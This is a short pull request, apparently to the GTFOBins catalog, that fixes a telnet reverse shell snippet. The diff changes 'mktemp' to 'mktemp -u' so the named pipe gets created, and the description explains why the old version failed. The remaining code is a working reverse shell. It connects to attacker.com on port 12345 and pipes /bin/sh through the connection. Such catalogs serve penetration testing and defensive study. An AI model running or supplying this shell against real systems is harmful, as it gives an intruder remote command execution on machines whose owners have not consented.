### PR TITLE
telnet.md(hotfix): Fixed a bug in telnet reverse shell

### DIFF
--- a/_gtfobins/telnet.md
+++ b/_gtfobins/telnet.md
@@ -13,7 +13,7 @@ functions:
       code: |
         RHOST=attacker.com
         RPORT=12345
-        TF=$(mktemp)
+        TF=$(mktemp -u)
         rm $TF
         mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
   sudo-enabled:


### PR DESCRIPTION
Fixed a bug in reverse shell code for telnet. Basically, the original code using mktemp would simply create a temp file and then mkfifo would also attempt to create a temp file. This failed reverse shell. With this fix, the 'mktemp -u' will only suggest a name to use for tmp file and then mkfifo will utilize this name to create a tmp file. 